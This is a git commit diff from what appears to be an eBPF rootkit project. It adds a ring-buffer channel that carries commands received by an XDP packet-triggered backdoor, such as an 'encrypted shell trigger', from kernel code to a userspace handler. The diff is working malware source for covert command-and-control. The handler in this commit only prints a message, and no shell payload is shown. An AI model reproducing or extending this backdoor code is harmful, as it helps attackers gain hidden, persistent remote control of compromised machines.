Completed message passing of commands to userspace via ebpf ringbuffer

2025-12-16 23:33:06 +08:00 · 2022-05-05 13:22:47 -04:00
parent 2deebf1b9e
commit 0553ad777f
7 changed files with 1146 additions and 1082 deletions
--- a/src/.output/kit.o
+++ b/src/.output/kit.o
--- a/src/.output/kit.skel.h
+++ b/src/.output/kit.skel.h
--- a/src/bin/kit
+++ b/src/bin/kit
--- a/src/common/map_common.h
+++ b/src/common/map_common.h
@@ -7,7 +7,8 @@ typedef enum {
    INFO,
    DEBUG,
    EXIT,
-    ERROR
+    ERROR,
+    COMMAND
 } event_type_t;

 struct rb_event {
--- a/src/ebpf/include/data/ring_buffer.h
+++ b/src/ebpf/include/data/ring_buffer.h
@@ -42,6 +42,25 @@ static __always_inline int ring_buffer_send(struct ring_buffer *rb, int pid, eve
    return 0;
 }

+/**
+ * @brief Sends an event indicating a received command in the backdoor
+ * 
+ * @return 0 if ok, -1 if error
+ */
+static __always_inline int ring_buffer_send_backdoor_command(struct ring_buffer *rb, int pid, int code){
+    struct rb_event *event = (struct rb_event*) bpf_ringbuf_reserve(rb, sizeof(struct rb_event), 0);
+    if(!event){
+        return -1;
+    }
+
+    event->code = code;
+    event->event_type = COMMAND;
+    event->pid = pid;
+
+	bpf_ringbuf_submit(event, 0);
+    return 0;
+}
+    



--- a/src/ebpf/include/xdp/backdoor.h
+++ b/src/ebpf/include/xdp/backdoor.h
@@ -4,6 +4,10 @@
 #include "headervmlinux.h"

 #include <bpf/bpf_helpers.h>
+#include <bpf/bpf_tracing.h>
+#include <bpf/bpf_core_read.h>
+
+#include "../data/ring_buffer.h"
 #include "../../common/c&c.h"

 static __always_inline int manage_backdoor_trigger_v1(char* payload, __u32 payload_size){
@@ -73,9 +77,11 @@ static __always_inline int manage_backdoor_trigger_v1(char* payload, __u32 paylo

    //If we reach this point then we received trigger packet
    bpf_printk("Finished backdoor V1 check with success\n");
+    int pid = -1; //Received by network stack, just ignore
    switch(command_received){
        case CC_PROT_K3_ENCRYPTED_SHELL_TRIGGER_V1:
            bpf_printk("Received request to start encrypted connection\n");
+            ring_buffer_send_backdoor_command(&rb_comm, pid, command_received);
            break;
        default:
            bpf_printk("Command received unknown: %d\n", command_received);
--- a/src/user/kit.c
+++ b/src/user/kit.c
@@ -14,6 +14,7 @@

 #include "../common/constants.h"
 #include "../common/map_common.h"
+#include "../common/c&c.h"
 #include "include/utils/files/path.h"
 #include "include/utils/strings/regex.h"
 #include "include/utils/structures/fdlist.h"
@@ -103,8 +104,18 @@ static int handle_rb_event(void *ctx, void *data, size_t data_size){

 	}else if(e->event_type == EXIT){

+	}else if(e->event_type == COMMAND){
+		printf("%s COMMAND  pid:%d code:%i\n", ts, e->pid, e->code);
+		switch(e->code){
+			case CC_PROT_K3_ENCRYPTED_SHELL_TRIGGER_V1:
+				printf("Starting encrypted connection\n");
+				
+            	break;
+			default:
+				printf("Command received unknown: %d\n", e->code);
+		}
 	}else{
-		printf("UNRECOGNIZED RB EVENT RECEIVED");
+		printf("%s COMMAND  pid:%d code:%i, msg:%s\n", ts, e->pid, e->code, e->message);
 		return -1;
 	}